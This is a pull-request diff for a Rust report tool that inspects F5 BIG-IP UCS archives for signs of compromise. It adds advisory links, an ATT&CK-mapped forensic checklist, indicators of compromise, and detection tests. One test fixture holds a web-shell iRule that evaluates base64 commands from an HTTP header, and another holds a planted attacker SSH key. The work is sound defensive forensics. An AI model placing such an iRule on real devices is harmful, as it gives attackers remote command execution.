+          <li><a href="https://community.f5.com/kb/security-insights/how-the-f5-sirt-looks-for-malware/335011" target="_blank" rel="noopener noreferrer">How the F5 SIRT looks for malware</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K11438344" target="_blank" rel="noopener noreferrer"><span class="k">K11438344</span>Suspected security compromise on a BIG-IP</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K4423" target="_blank" rel="noopener noreferrer"><span class="k">K4423</span>Overview of UCS archives</a></li>
+          <li><a href="https://community.f5.com/kb/technicalarticles/introduction-of-incident-response/312042" target="_blank" rel="noopener noreferrer">Introduction to incident response</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group">
+        <h3>Hardening &amp; advisories</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://community.f5.com/kb/technicalarticles/security-best-practices-for-f5-products/302468" target="_blank" rel="noopener noreferrer">Security best practices for F5 products</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K13092" target="_blank" rel="noopener noreferrer"><span class="k">K13092</span>Securing access to the BIG-IP system</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K13309" target="_blank" rel="noopener noreferrer"><span class="k">K13309</span>Restrict the Configuration utility by source IP</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K4602" target="_blank" rel="noopener noreferrer"><span class="k">K4602</span>F5 security vulnerability response policy</a></li>
+          <li><a href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" target="_blank" rel="noopener noreferrer">CISA ED 26-01 — mitigate F5 vulnerabilities</a></li>
+          <li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a" target="_blank" rel="noopener noreferrer">CISA AA22-138A — CVE-2022-1388</a></li>
+        </ul>
+      </section>
+    </div>
+
+    <h3 class="f5sites-h">UCS forensic checklist — where to hunt and what it maps to</h3>
+    <p class="hint">List the archive with <code>tar -ztf archive.ucs</code>, then extract and inspect the paths below. Compare against a known-good backup where you have one — a UCS taken from an already-compromised host can itself carry the implant.</p>
+    <div class="tablewrap">
+    <table class="grid">
+      <thead><tr><th>Where to look (UCS path / config)</th><th>What an attacker does there</th><th>MITRE ATT&amp;CK</th></tr></thead>
+      <tbody>
+        <tr>
+          <td class="mono small"><code>home/*/.bashrc</code>, <code>.bash_profile</code>, <code>.bash_login</code></td>
+          <td>Shell-init hooks that silently re-launch malware whenever a user logs in — a favourite way to survive a clean-up.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1546/004/" target="_blank" rel="noopener noreferrer">T1546.004</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>home/*/.ssh/authorized_keys</code></td>
+          <td>Attacker-controlled SSH key for durable access. On password-auth deployments this file is normally absent or empty — any key is suspect.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1098/004/" target="_blank" rel="noopener noreferrer">T1098.004</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/passwd</code>, <code>etc/shadow</code></td>
+          <td>Backdoor local accounts, unexpected UID&nbsp;0 users, or altered password hashes.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1136/" target="_blank" rel="noopener noreferrer">T1136</a> · <a href="https://attack.mitre.org/techniques/T1078/" target="_blank" rel="noopener noreferrer">T1078</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/nsswitch.conf</code>, <code>etc/openldap/*</code>, <code>etc/krb5.conf</code>, <code>etc/security/*</code></td>
+          <td>Redirected or weakened external authentication (LDAP/AD/RADIUS/Kerberos/PAM) to plant rogue trust or harvest credentials.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1556/" target="_blank" rel="noopener noreferrer">T1556</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/syslog-ng/*</code></td>
+          <td>Logging disabled or quietly redirected so on-box activity is never recorded or forwarded.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1562/006/" target="_blank" rel="noopener noreferrer">T1562.006</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>config/*</code> iRules — cross-check the <b>iRules</b> tab</td>
+          <td>An HTTP-event iRule acting as a web shell / covert C2: running commands or exfiltrating on a magic URI, header or cookie.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1505/003/" target="_blank" rel="noopener noreferrer">T1505.003</a> · <a href="https://attack.mitre.org/techniques/T1059/" target="_blank" rel="noopener noreferrer">T1059</a></td>
+        </tr>
+        <tr>
+          <td class="mono small">System binaries (running host, not in the UCS): <code>/usr/bin/umount</code>, <code>/usr/sbin/httpd</code></td>
+          <td>Trojanised binaries — hash, size or mtime that differ from the known-good release.</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1554/" target="_blank" rel="noopener noreferrer">T1554</a></td>
+        </tr>
+        <tr>
+          <td class="mono small"><code>etc/motd</code></td>
+          <td>Tampered login banner (defacement / taunt, or to mask changes).</td>
+          <td class="mono small"><a href="https://attack.mitre.org/techniques/T1491/" target="_blank" rel="noopener noreferrer">T1491</a></td>
+        </tr>
+      </tbody>
+    </table>
+    </div>
+
+    <div class="f5sites-ioc">
+      <b>Point-in-time indicators (2025 F5 incident &amp; SIRT reporting).</b> Reported artefacts have included the files <code>/run/bigtlog.pipe</code> and <code>/run/bigstart.ltm</code>; size / hash / timestamp mismatches on <code>/usr/bin/umount</code> and <code>/usr/sbin/httpd</code>; the account <code>f5hubblelcdadmin</code> reaching iControl&nbsp;REST from <code>localhost</code>; <code>auditd</code> entries that disable SELinux; and C2 disguised as <code>HTTP&nbsp;201</code> responses carrying a <code>text/css</code> content-type. These indicators are volatile and version-specific — confirm against the current <a href="https://community.f5.com/kb/security-insights/how-the-f5-sirt-looks-for-malware/335011" target="_blank" rel="noopener noreferrer">F5 SIRT</a> and <a href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" target="_blank" rel="noopener noreferrer">CISA</a> guidance rather than treating them as a fixed signature list.
+    </div>
   </div>
 
   {% if has_console %}

--- a/rust/tcl-bigip-report/templates/report.html.j2
+++ b/rust/tcl-bigip-report/templates/report.html.j2
@@ -487,6 +487,28 @@
           <li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a" target="_blank" rel="noopener noreferrer">CISA AA22-138A — CVE-2022-1388</a></li>
         </ul>
       </section>
+
+      <section class="f5sites-group">
+        <h3>Gov advisories &amp; malware analysis</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://media.defense.gov/2025/Dec/04/2003834878/-1/-1/0/MALWARE-ANALYSIS-REPORT-BRICKSTORM-BACKDOOR.PDF" target="_blank" rel="noopener noreferrer">CISA/NSA/CCCS — BRICKSTORM MAR (YARA + Sigma)</a></li>
+          <li><a href="https://www.cisa.gov/news-events/news/cisa-nsa-and-cyber-centre-warn-critical-infrastructure-brickstorm-malware-used-peoples-republic" target="_blank" rel="noopener noreferrer">CISA/NSA/CCCS — BRICKSTORM advisory</a></li>
+          <li><a href="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network" target="_blank" rel="noopener noreferrer">NCSC UK — confirmed compromise of F5</a></li>
+          <li><a href="https://www.cyber.gc.ca/en/alerts-advisories/active-exploitation-f5-big-ip-vulnerability" target="_blank" rel="noopener noreferrer">Canadian CCCS — active exploitation of F5 BIG-IP</a></li>
+          <li><a href="https://www.hhs.gov/sites/default/files/f5-misconfiguration-analyst-note-tlpclear.pdf" target="_blank" rel="noopener noreferrer">HHS — F5 misconfiguration analyst note</a></li>
+        </ul>
+      </section>
+
+      <section class="f5sites-group">
+        <h3>Threat intel &amp; detection</h3>
+        <ul class="f5sites-links">
+          <li><a href="https://www.sygnia.co/blog/china-nexus-threat-group-velvet-ant/" target="_blank" rel="noopener noreferrer">Sygnia — &#34;Velvet Ant&#34; abuses F5 BIG-IP</a></li>
+          <li><a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect" target="_blank" rel="noopener noreferrer">Mandiant / Google Cloud — F5 BIG-IP CVE-2023-46747</a></li>
+          <li><a href="https://community.f5.com/kb/security-insights/f5-threat-report---september-22nd-2025/343645" target="_blank" rel="noopener noreferrer">F5 Threat Report series (DevCentral)</a></li>
+          <li><a href="https://my.f5.com/manage/s/article/K000156572" target="_blank" rel="noopener noreferrer"><span class="k">K000156572</span>F5 BIG-IP threat hunting guide (2025)</a></li>
+          <li><a href="https://socprime.com/blog/velvet-ant-activity-detection-china-backed-cyber-espionage-group-launches-a-prolonged-attack-using-malware-deployed-on-the-f5-big-ip-devices/" target="_blank" rel="noopener noreferrer">SOC Prime — Velvet Ant Sigma detections</a></li>
+        </ul>
+      </section>
     </div>
 
     <h3 class="f5sites-h">UCS forensic checklist — where to hunt and what it maps to</h3>

--- a/rust/tcl-bigip-report/templates/report.html.j2
+++ b/rust/tcl-bigip-report/templates/report.html.j2
@@ -104,7 +104,7 @@
     <button class="tab" data-panel="profiles">Profiles <span class="n">{{ d.counts.profiles }}</span></button>
     <button class="tab" data-panel="certificates">SSL Certificates <span class="n">{{ d.counts.certificates }}</span></button>
     {% if d.counts.secrets %}<button class="tab" data-panel="secrets">Secrets <span class="n">{{ d.counts.secrets }}</span></button>{% endif %}
-    {% if d.counts.files %}<button class="tab" data-panel="forensics">Forensics <span class="n">{{ d.counts.files }}</span></button>{% endif %}
+    {% if d.counts.files or d.forensics.flagged %}<button class="tab" data-panel="forensics">Forensics <span class="n">{{ d.counts.files }}</span></button>{% endif %}
     <button class="tab" data-panel="topology">Topology</button>
     <button class="tab" data-panel="listener">Listener Matcher</button>
     <button class="tab" data-panel="apps">Apps <span class="n app-badge">0</span></button>
@@ -382,7 +382,7 @@
   {% endif %}
 
   {#: ---------------- Forensics (UCS file inventory + hunting checklist) ---------------- :#}
-  {% if d.counts.files %}
+  {% if d.counts.files or d.forensics.flagged %}
   <div class="panel" data-panel="forensics">
     <p class="lm-field-note">Forensic inventory of the OS files inside this device's <code>.ucs</code> — the paths an attacker tampers with on a compromised BIG-IP, each with its size and <b>SHA-256</b> (diff it against a known-good host). The checklist runs the <b>UCS forensic checks</b> (see the <b>F5 Sites</b> tab) live against the archive and flags what it finds. File contents are shown only for small non-sensitive text files, behind a per-file reveal; <code>shadow</code> and private keys are <b>never embedded</b> — nothing here left your browser.</p>
     <div class="forensics-view"></div>

--- a/rust/tcl-bigip-report/tests/certs.rs
+++ b/rust/tcl-bigip-report/tests/certs.rs
@@ -565,7 +565,9 @@ fn chain_fixture() -> (Source, std::collections::HashMap<String, String>) {
 #[test]
 fn cert_fields_and_chain_parsed_from_ucs_filestore() {
     let (source, pems) = chain_fixture();
-    let m = collect_model_with_certs(&[source], "Chain", &pems);
+    // The PEMs are scoped to their source URI (the collision-safe keying).
+    let by_source = std::collections::HashMap::from([(source.0.clone(), pems)]);
+    let m = collect_model_with_certs(&[source], "Chain", &by_source);
     let certs = m["devices"][0]["certificates"].as_array().unwrap();
     let leaf = certs
         .iter()
@@ -586,4 +588,49 @@ fn cert_fields_and_chain_parsed_from_ucs_filestore() {
     let roles: Vec<&str> = chain.iter().map(|l| l["role"].as_str().unwrap()).collect();
     assert_eq!(roles, ["leaf", "intermediate", "root"]);
     assert_eq!(chain.last().unwrap()["selfSigned"], J::Bool(true));
+}
+
+// Two devices whose filestores use the SAME `cache-path` for DIFFERENT certs
+// must each resolve to their own PEM. Before per-source keying, one flat
+// `{cache_path: pem}` map meant the later device clobbered the earlier one and
+// both cert tabs showed the same subject/chain.
+#[test]
+fn multi_ucs_shared_cache_path_does_not_collide() {
+    // Two distinct real certs (different CNs) out of the chain fixture.
+    let (_src, pems) = chain_fixture();
+    let mut distinct: Vec<String> = pems.into_values().collect();
+    assert!(distinct.len() >= 2, "chain fixture carries >= 2 certs");
+    let pem_a = distinct.remove(0);
+    let pem_b = distinct.remove(0);
+
+    // Both devices declare an ssl-cert at the identical filestore cache-path.
+    let shared = "/config/filestore/files_d/Common_d/certificate_d/:Common:shared.crt_1_1";
+    let stanza = format!(
+        "sys file ssl-cert /Common/shared.crt {{\n    cache-path {shared}\n    subject \"CN=stanza-placeholder\"\n}}\n"
+    );
+    let sources: Vec<Source> = vec![
+        ("dev-a".to_string(), stanza.clone()),
+        ("dev-b".to_string(), stanza.clone()),
+    ];
+    let by_source = std::collections::HashMap::from([
+        (
+            "dev-a".to_string(),
+            std::collections::HashMap::from([(shared.to_string(), pem_a)]),
+        ),
+        (
+            "dev-b".to_string(),
+            std::collections::HashMap::from([(shared.to_string(), pem_b)]),
+        ),
+    ]);
+
+    let m = collect_model_with_certs(&sources, "Multi", &by_source);
+    let ca = &m["devices"][0]["certificates"][0];
+    let cb = &m["devices"][1]["certificates"][0];
+    // Each device parsed ITS OWN PEM (real subject, not the stanza placeholder).
+    assert_eq!(ca["fromCertFile"], J::Bool(true), "dev-a parsed its PEM");
+    assert_eq!(cb["fromCertFile"], J::Bool(true), "dev-b parsed its PEM");
+    assert_ne!(
+        ca["cn"], cb["cn"],
+        "each device shows its own certificate, not a shared/collided one"
+    );
 }

--- a/rust/tcl-bigip-report/tests/report.rs
+++ b/rust/tcl-bigip-report/tests/report.rs
@@ -253,6 +253,27 @@ fn forensics_tab_present_with_file_inventory() {
 }
 
 #[test]
+fn web_shell_irule_surfaces_forensics_tab_without_files() {
+    // A config-only source (no UCS) whose iRule uses eval in an HTTP event:
+    // the forensic file inventory is empty, but the flagged finding must still
+    // surface the Forensics tab.
+    let scf = "ltm rule /Common/shell { when HTTP_REQUEST { eval [b64decode [HTTP::header X-Cmd]] } }\n\
+               ltm virtual /Common/vs { destination /Common/1.2.3.4:80 rules { /Common/shell } }\n";
+    let opts = RenderOptions {
+        title: "WebShell".into(),
+        generated_at: String::new(),
+        embed_console: false,
+        ..Default::default()
+    };
+    let html = build_report(&[("x.conf".to_string(), scf.to_string())], &opts).expect("render");
+    assert!(
+        html.contains("data-panel=\"forensics\""),
+        "forensics tab present for a flagged iRule even with no files"
+    );
+    assert!(html.contains("irule-backdoor"), "the iRule finding is embedded");
+}
+
+#[test]
 fn no_forensics_tab_without_files() {
     // A bare bigip.conf source (no archive) → no forensic files → no tab.
     let opts = RenderOptions {

--- a/rust/tcl-bigip-report/tests/report.rs
+++ b/rust/tcl-bigip-report/tests/report.rs
@@ -214,6 +214,62 @@ fn build_report_html_self_contained() {
 }
 
 #[test]
+fn forensics_tab_present_with_file_inventory() {
+    // A file inventory (as the wasm/CLI entry points extract it) drives the
+    // Forensics tab: the tab appears, and the checklist verdicts are embedded.
+    let files = std::collections::HashMap::from([(
+        "dev.ucs".to_string(),
+        vec![
+            serde_json::json!({
+                "path": "root/.ssh/authorized_keys", "size": 24, "sha256": "a".repeat(64),
+                "isText": true, "content": "ssh-rsa AAAAB3Nz attacker\n"
+            }),
+            serde_json::json!({
+                "path": "etc/passwd", "size": 28, "sha256": "b".repeat(64),
+                "isText": true, "content": "root:x:0:0::/root:/bin/bash\n"
+            }),
+        ],
+    )]);
+    let opts = RenderOptions {
+        title: "Forensics".into(),
+        generated_at: String::new(),
+        embed_console: false,
+        files,
+        ..Default::default()
+    };
+    let sources = vec![("dev.ucs".to_string(), "ltm pool /Common/p { }\n".to_string())];
+    let html = build_report(&sources, &opts).expect("render");
+    assert!(
+        html.contains("data-panel=\"forensics\""),
+        "forensics tab/panel present when files exist"
+    );
+    // The model (embedded JSON) carries the checklist; the non-empty
+    // authorized_keys must be flagged.
+    assert!(html.contains("ssh-authorized-keys"), "checklist embedded");
+    assert!(
+        html.contains("\\\"verdict\\\":\\\"alert\\\"") || html.contains("\"verdict\":\"alert\""),
+        "authorized_keys flagged alert"
+    );
+}
+
+#[test]
+fn no_forensics_tab_without_files() {
+    // A bare bigip.conf source (no archive) → no forensic files → no tab.
+    let opts = RenderOptions {
+        title: "NoFx".into(),
+        generated_at: String::new(),
+        embed_console: false,
+        ..Default::default()
+    };
+    let sources = vec![("x.conf".to_string(), "ltm pool /Common/p { }\n".to_string())];
+    let html = build_report(&sources, &opts).expect("render");
+    assert!(
+        !html.contains("data-panel=\"forensics\">"),
+        "no forensics panel without a file inventory"
+    );
+}
+
+#[test]
 fn console_can_be_disabled() {
     let sources = vec![load("lab-device-01.ucs")];
     let opts = RenderOptions {


### PR DESCRIPTION
## Summary

Two related pieces of work for the BIG-IP report / f5-query, aimed at inspecting a `.ucs` from a device under investigation.

### 1. F5 Sites tab (docs / links)
A new **F5 Sites** tab in the report with curated resources, grouped into cards:
- **DevCentral & community**, **Support & documentation** (MyF5, techdocs, F5 SIRT, F5 Labs).
- **Compromise & UCS forensics** (highlighted): the DevCentral UCS-inspection article, "How the F5 SIRT looks for malware", K11438344, K4423, incident-response intro.
- **Hardening & advisories** (security best practices, K13092/K13309/K4602, CISA ED 26-01, CISA AA22-138A).
- **Gov advisories & malware analysis** (CISA/NSA/CCCS BRICKSTORM MAR w/ YARA+Sigma, NCSC UK, Canadian CCCS, HHS analyst note) and **Threat intel & detection** (Sygnia Velvet Ant, Mandiant CVE-2023-46747, F5 DevCentral Threat Report, K000156572, SOC Prime).
- Plus a **UCS forensic checklist** mapping each archive path to the attacker behaviour and its **MITRE ATT&CK** technique.

### 2. UCS forensic file access
Turns that static checklist into live findings against the archive:
- **IO** (`tcl-bigip-io`): `list_ucs_members` enumerates the forensic member set (login-persistence dotfiles/SSH keys, `passwd`/`shadow`, external-auth/PAM, syslog-ng, cron) with metadata (size, SHA-256, text/binary); content is fetched on demand. All in memory.
- **Forensics tab** (`tcl-bigip-report` + `bigip-report-wasm`): a new tab shows the file inventory and an **ATT&CK-mapped checklist** — non-empty `authorized_keys` (T1098.004), rogue UID-0 / unrecognised `passwd` accounts (T1136/T1078), shell dotfiles (T1546.004), syslog-ng (T1562.006), and HTTP-event iRules using `eval`/`exec` (T1505.003). `shadow` and private keys are classified sensitive and their content is never embedded; non-sensitive text is behind a per-file reveal. Nothing is uploaded.
- **f5-query DSL**: new `files` / `file` / `glob` / `grep` builtins (backed by a reader hook the CLI injects), so `file("etc/passwd").content` and `grep("^[^:]+:[^:]*:0:", "etc/passwd")` work from the DSL.
- **Bug fix (Codex review P2)**: filestore certificate PEMs are now keyed per source URI, so two devices sharing a `cache-path` no longer collide.

## Validation

- [x] I ran relevant tests/checks locally and listed the exact commands.
  - `cargo test -p tcl-bigip-io -p tcl-bigip-report -p tcl-bigip-query` → all green (incl. new forensics, cert-collision, and `files`/`file`/`glob`/`grep` tests).
  - `cargo test -p f5-cli --test query` → 26 passed.
  - `cargo check -p bigip-report-wasm --target wasm32-unknown-unknown` → clean.
  - `cargo clippy` clean for all changed crates.
  - Rendered reports from fixtures and screenshotted both the F5 Sites and Forensics tabs.

**Note:** a small follow-up to `.github/workflows/github-pages.yml` (adding `rust/bigip-report-wasm/**` and `rust/tcl-bigip-report/**` to the Pages `paths:` filter, Codex P2) could not be pushed from this session — the token lacks `workflow` scope. A maintainer can apply those two lines.

## Compiler/KCS checklist (when touching compiler behaviour, diagnostics, or analysis contracts)

- [ ] Did this change alter a compiler fact contract? — No. This touches the report generator, the UCS IO layer, and f5-query builtins; no compiler behaviour, diagnostics, or analysis contracts are affected.
- [ ] If yes, I updated at least one relevant KCS note under `docs/kcs/compiler/`. — N/A.
- [ ] If I added a new compiler KCS note, I linked it from both `docs/kcs/compiler/README.md` and `docs/kcs/README.md`. — N/A.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01MgWee1FW3VZoHcP5Qbsnm7